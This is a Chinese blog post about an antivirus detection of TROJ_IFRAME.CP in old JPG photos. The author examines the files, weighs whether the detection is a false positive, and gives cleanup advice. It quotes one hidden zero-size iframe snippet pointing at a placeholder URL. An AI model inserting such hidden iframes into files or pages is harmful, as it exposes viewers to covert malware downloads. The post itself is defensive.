上次抢救手机存储卡数据时,把存储卡插入读卡器连接电脑,当时没有什么动静,但后来偶然发现那台用来连接的电脑上的趋势杀毒软件杀毒日志中突然有了记录,说是我的那张存储卡上有病毒,一看都是jpg图片文件,报的病毒名是TROJ_IFRAME.CP,因为设置是杀毒不提示,所以当时并没有注意到。既然是IFRAME应该就有什么网址之类的东西在里面,用记事本打开那几个图片文件以前的备份,用“http”作关键字全文搜索,果然在文件最后出现了iframe调用,类似“<iframe src=http://xxx width=0 height=0></iframe>”,确实有可疑网址,而且设置高度与宽度(height、width)为0,就是隐藏,和挂木马的手法一样。
不过把几个图片样本上传到http://www.virscan.org/去扫描检查,发现只有趋势、麦咖啡、小红伞几个杀毒软件会报出病毒,我这些图片都是去年以前收集的,就算是有木马,应该也算是老的,怎么会大部分杀毒软件没反应(据说卡巴斯基也会报)。到网上搜索了一下,也有人说是误报,不过说得不是很清楚,不能当作结论,去习科论坛问了下也没有明确的结果,网上苗得雨挂马文章中倒是讲了在图片中加木马的方法,但却说这种加入木马的图片很可能不能正常显示,就算能显示,也可能无法预览,而我的图片却是显示、预览都正常的。所以我猜想(很可惜没有留下样本,全被我一次性处理掉了,因为图片特殊不便公开,呵呵,结果只能想了)如果真的是误报,应该也是采用了与挂木马相同的手法,而如果是真的含有病毒木马,应该也是需要用浏览器打开这些jpg图片浏览时才激活(毕竟是用iframe),而我一般是用ACDSee来浏览图片,应该没有问题,而激活图片中iframe再下载木马,也可能是与系统某个漏洞有关,因为毕竟是旧的图片,这种补丁应该也早出了,所以打上系统补丁也应该没问题了。
总结一下,首先要打全系统安全补丁,这是很重要的,然后多用专门的看图软件来看图片吧,至于浏览器,还是用非IE核心的会安全点。最后关于TROJ_IFRAME.CP的清除,趋势是能报不能清,所做的处理就是整个文件删除(好听点叫隔离),所以要保住图片又清除TROJ_IFRAME.CP的方法就是另存图片,不论是windows的画图、还是ACDSee、photoshop等都可以另存图片,重新保存一下,再打开就找不到iframe了,毕竟它们不属于图片。
>> 除非说明均为原创,如转载请注明来源于http://www.stormcn.cn/post/334.html
